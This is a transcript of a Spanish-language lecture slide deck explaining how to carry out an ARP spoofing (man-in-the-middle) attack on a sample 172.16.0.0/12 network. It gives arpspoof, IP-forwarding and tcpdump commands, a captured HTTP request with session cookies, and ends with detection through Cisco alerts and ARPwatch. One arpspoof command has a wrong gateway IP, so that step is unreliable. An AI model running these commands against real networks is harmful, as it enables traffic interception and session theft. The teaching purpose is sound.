como hacer arp spoofing e
Post on 10-Jul-2015
1.520 Views
Preview:
TRANSCRIPT
Como hacer ARP
SpoofingClase 5 E
21/03/2013
Como hacer ARP Spoofing
Una de mejores formas de solucionar un problema, es saber cual es y creo
que no hay mejor forma de entenderlo que intentar hacerlo. Hoy vamos a
ver como hacer ARP Spoofing (también llamado ARP Poisoning)
Esquema inicial
Como hacer ARP Spoofing
Vamos a suponer una red ficticia: 172.16.0.0/12, en la cual el gateway esta
en la 172.16.0.1 y existen dos hosts: 172.16.0.2 (el usuario) y 172.16.0.3 (el
atacante)
Para simplificar, la MAC de los equipos corresponderá a el último byte de
la IP. Por ejemplo, si la IP es 172.16.0.1, asumiremos que si MAC es
00:00:00:00:00:01
Como hacer ARP Spoofing
Mediante arpspoof podemos realizar el spoofing mediante los siguientes
parámetros:
-i: interfaz en el que haremos el spoofing
-t: El target a quien le vamos a decir nuestra MAC
La IP del host que queremos suplantar
Como hacer ARP Spoofing
Para evitar que se corte el trafico del usuario deberemos activar IP
forwarding. Simplemente deberemos hacer un echo al proc:
echo 1 > /proc/sys/net/ipv4/ip_forward
Como hacer ARP Spoofing
A continuación deberemos envenenar la tabla ARP de tanto el gateway
como el usuario para obtener hacer pasar el tráfico por el sistema del
atacante en ambas direcciones:
arpspoof -i eth0 -t 172.16.0.2 172.16.0.1
Envenenando la tabla ARP del usuario
Como hacer ARP Spoofing
A continuación hacemos lo mismo (en paralelo) con el gateway:
arpspoof -i eth0 -t 172.10.0.1 172.16.0.2
Envenenando la tabla ARP del gateway
Como hacer ARP Spoofing
Con esto ya podemos hacer un tcpdump en el equipo atacante para
capturar todo el tráfico del usuario:
tcpdump -nni eth0 'host 172.16.0.2' -s 0 -w /tmp/all.your.packet.are.belong.to.us
Equipo haciendo ARP Spoofing
Como hacer ARP Spoofing Un ejemplo de tráfico HTTP que podríamos ver sería:
GET http://www.google.es/search?hl=es&source=hp&q=HOLA&btnG=Buscar+con+Google&meta=&aq=f&oq=
HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.1.6; Google-TR-5.9.911.3589-es) Gecko/20091201
Firefox/3.5.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://www.google.com/
Cookie: SS=Q0=bWFuIG5j;
PREF=ID=0d7e92f0a892dcdb:U=a0d7411c93a9da83:TM=1261735618:LM=1261735947:S=usa2aENTuGjs6433;
NID=30=E85Pp_GbpOrzO3dZsK8DqZiZ08XdR-C8BuJ3sEFDN5DHuw2TY8ew0a_QE_q8R6XNDEE439iNspdpZUOLexoMb
jHOcepayTpXPMwsxFNgAK951t59ZSaXI0qNxq0xQ0wg; SID=DQAAAIUAAACDMrYRGnoD5BYlPIKfMF1oOgds-
T_bIw7Ynjy6wVbkOIDSglRTdglRiVY8VFb44ndsuboemg6oMecz-
a8y8bprLcUh0U0Kkij68JSc2aYCyldfKVIZyO518ywtcjTvozNh9v3Vrvf25OwTypC9F9h
4oUWfQnHxY6AGpcPtecNo1f4QvHD3maLGRuh-uE89Ju8; HSID=AX3Vf3Lm0i2yz9st-
Como hacer ARP Spoofing
En equipos CISCO en este tipo de ataques se generaría
una alerta similar a la siguiente:
Dec 31 09:53:10 MET: %SW_MATM-4-MACFLAP_NOTIF:
Host 000a.aaac.007f in vlan 10 is flapping between port
Gi0/1 and port Gi0/2
Existen diferentes herramientas para detectar este tipo
de ataques, siendo el más conocido el ARPwatch.
top related